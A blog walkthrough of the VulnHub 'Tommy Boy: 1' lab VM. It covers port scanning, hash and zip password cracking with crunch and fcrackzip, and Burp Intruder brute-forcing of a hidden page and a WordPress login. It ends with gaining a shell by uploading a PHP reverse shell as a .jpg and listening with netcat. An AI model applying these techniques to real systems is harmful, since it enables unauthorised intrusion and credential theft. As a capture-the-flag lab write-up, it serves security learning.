[VULNHUB] Tommy Boy: 1

Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of a website, The Callahan Auto company and collect 5 flags to unlock a final message. Let’s start!

FLAG 1

First of all scan the website IP with nmap:

nmap 192.168.1.15 -A

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST
Nmap scan report for 192.168.1.15
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

There are 3 services running on the machine, 2 website and an ssh. Open 192.168.1.15 on the browser and you will see an error message saying that I need to restore the backup of the website. Analyzing the source code of the page I notice this:

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

There is an hidden blog of the company stored into an hidden folder which name should be guessed watching the YouTube video linked into the comments. The video is just a phrase “Hey Prehistoric Forest”, so try to open /prehistoricforest. It works, we are into the company blog! Before analyzing it, open /robots.txt which has interesting entries as nmap said:

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

There are 3 folder which contain some images which I can ignore and a .txt file, the first flag. Just browse to /flag-numero-uno.txt, the first flag is: B34rcl4ws. Now we can analyze the blog.

Flag 2

Open the blog again and start read the posts. There is a message by richard which is protected by a password that I need to find. The latest post on the blog it’s a request by Tom Jr. asking to richard the password of the post and there is a comment, read it:

Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.

Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.

So let’s navigate to /richard and download the image shockedrichard.jpg. I am pretty sure that the password is hidden into the image comment, I used exiftool to extract it:

./exiftool shockedrichard.jpg

This is the output:

ExifTool Version Number         : 10.24
File Name                       : shockedrichard.jpg
Directory                       : /home/cristiano/Scaricati
File Size                       : 163 kB
File Modification Date/Time     : 2016:08:01 00:15:25+02:00
File Access Date/Time           : 2016:08:01 00:16:30+02:00
File Inode Change Date/Time     : 2016:08:01 00:15:25+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The image comment is:

ce154b5a8e59c89732bc25d6a2e6b90b

Seems to be an MD5 hash, decrypt it with HashKiller and you will find the post password: spanky. Now we can read the post; in a few words we need to restore the backup of the website renaming callahanbak.bak, which is located into Big Tom SSH account, to index.html. The SSH user name of Tom is into the list of WordPress users but I don’t have his password. Also there is an FTP service running on the machine listening onto a different default port (21), and this service it’s unstable: every 15 minutes it goes up and down. The FTP user name of richard is nickburns but I need to find the password which seems to be very easy to guess.
Let’s finish to analyze the remaining posts, notice the first post made into this blog, open the comment:

Well put boss 😉

Flag #2: thisisthesecondflagyayyou.txt

Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.

Flag 3

I focus myself to the FTP, so I rescan the IP with the maximum range of ports:

nmap 192.168.1.15 -p 1-65535

And now a wild port appears:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST
Nmap scan report for 192.168.1.15
Host is up (0.029s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

Open ftp command shell and type:

open 192.168.1.15 65534

Now i use nickburns as user name but I need to guess the password which can be egual to user name, so try nickburns as password. Now I am logged into the FTP server, list the file and you will see a readme.txt. Download it:

get readme.txt

Close ftp shell and read the file:

cat readme.txt

There is a message from Nick who says that there is a /NickIzL33t subfolder somewhere in the server where there is an encrypted .zip which contains all Big Tom’s passwords. Also Nick says that I can use that folder as a Dropbox to access my files from the phone. There are no subfolder into 192.168.1.15 but there is another http service which is listening on port 8008, so navigate to 192.168.1.15:8008 and you will see a simple HTML Nick page. Browse to /NickIzL33t and another Nick HTML page appears but seems to be nothing. So I try to change my User-Agent to a mobile device (iOS) with Burpsuite as proxy and when I refreshed the page, it changed! There is a message which says:

Gotta know the EXACT name of the .html to break into this fortress.

So it’s time to do a bruteforce attack. I captured the GET request of the website
with Burpsuite refreshing the page, then I sent it to the Intruder with the following payload:

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

I used rockyou.txt as wordlist and I started the attack. After some minutes I found fallon1.html as an HTML page with response code 200. So I navigate to /NickIzL33t/fallon1.html and the famous page shows up.
I found an hint:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

The 3rd flag: TinyHead and the encrypted .zip file.

Flag 4

Now I need to decrypt the .<ip file which is protected by a password. Fortunately the password has a pattern, so I use crunch to create a custom wordlist:

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt

Now to decrypt the zip I use fcrackzip:

fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip

After some minutes I found the password: bevH00tr$1995

Unzip the file and open passwords.txt. Interesting section:

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

To find SSH password I need to break into WordPress blog but Big Tom seems to don’t remember his username, I use wpscan to enumerate users:

sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u

The output:

+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

So Big Tom username is tom but I need to find the password. The hint is a famous Queen song but I think it refers to rockyou.txt wordlist. So I used Burpsuite to bruteforce the login credentials. I intercepted the POST request from /wp-admin with the proxy then I sent to the Intruder the following payload:

POST /prehistoricforest/wp-login.php HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.15/prehistoricforest/wp-login.php
Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1

I waited some minutes, then I found the login password of tom: tomtom1. It’s time to login. Open Big Tom draft:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

So SSH user name of Big Tom is bigtommysenior and the password is fatguyinalittlecoat1938!!. Login with SSH:

ssh bigtommysenior@192.168.1.15

Insert the password and voilà, I am logged into the SSH. List files and you will notice the 4th flag which is EditButton and the backup file. Restore it:

cp callahanbak.bak /var/www/html/index.html

Navigating with your browser to /index.html you will see the home page of the website. Now we need to find the latest flag which is, according to the 4th one, in the root of this server at /5.txt.

Flag 5

Navigating to root directory and listing the file I see that I can’t read .5.txt, only the user www-data can do this, so I need to escalate privileges. Let’s check some directories with special permissions:

find / -perm -2 -type d 2>/dev/null

And an interesting one is showed:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads

Browse to /NickIzL33t/P4TCH_4D4MS (remember to change the User-Agent) and an upload form appears. Upload a PHP reverse shell as .jpg then rename the file into .php, in fact we have the access to /uploads folder into SSH. Listen locally for the incoming connection:

nc -lvp 1234

Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and the shell will be spawned into your local terminal. Just get the latest flag:

cat .5.txt

Which is: Buttcrack. Now return to the SSH shell, into BIg Tom home folder and unzip LOOT.ZIP. It will require a password which is all the flag putted together: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. THE-END.txt file will be extracted. Read it. VM is completely pwned!

Advertisements
[VULNHUB] Tommy Boy: 1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s